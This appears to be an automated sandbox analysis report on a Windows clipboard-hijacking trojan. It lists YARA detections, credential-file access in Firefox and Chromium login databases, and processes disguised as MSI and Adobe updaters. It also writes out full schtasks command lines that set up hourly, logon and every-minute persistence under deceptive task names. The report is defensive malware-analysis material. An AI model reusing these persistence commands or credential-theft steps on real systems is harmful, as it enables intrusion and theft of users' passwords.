Source: 22.2.IQUKpYR1BFFsqw1YWBOv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 24.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 24.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 41.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 41.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 29.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 29.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 10.2.VkHLTH_m2kErRb6vpA5n.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 10.2.VkHLTH_m2kErRb6vpA5n.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000017.00000002.2556843085.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000017.00000002.2556843085.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000A.00000002.2495381134.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000A.00000002.2495381134.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000E.00000002.2512361549.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000E.00000002.2512361549.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000F.00000002.2512547715.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000F.00000002.2512547715.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000029.00000002.2857457109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000029.00000002.2857457109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000020.00000002.2684473529.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000020.00000002.2684473529.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000023.00000002.2778342634.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000023.00000002.2778342634.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000026.00000002.4532446439.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000026.00000002.4532446439.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000D.00000002.2514737568.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000D.00000002.2514737568.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000016.00000002.2545838500.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000016.00000002.2545838500.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000002A.00000002.2950167796.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000002A.00000002.2950167796.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000018.00000002.2554981113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000018.00000002.2554981113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001D.00000002.2600512204.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001D.00000002.2600512204.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@52/34@3/5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063C9130 CreateToolhelp32Snapshot,Process32First,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle, 0_2_063C9130
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\signons.sqlite
Source: C:\Users\user\Desktop\file.exe Mutant created: \Sessions\1\BaseNamedObjects\slickSlideAnd2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2432:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4368:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Mutant created: \Sessions\1\BaseNamedObjects\jW5fQ5e-C7lR7tC1q
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2740:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2276:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\adobeaXLeM4rqVSWS
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.4533245156.0000000000515000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.4533245156.0000000000515000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: J_WXka4lbCqfLogin Data.0.dr, prD5bQEFZ56iLogin Data For Account.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 23%
Source: file.exe Virustotal: Detection: 30%
Source: file.exe String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe "C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe"
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe "C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe"
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
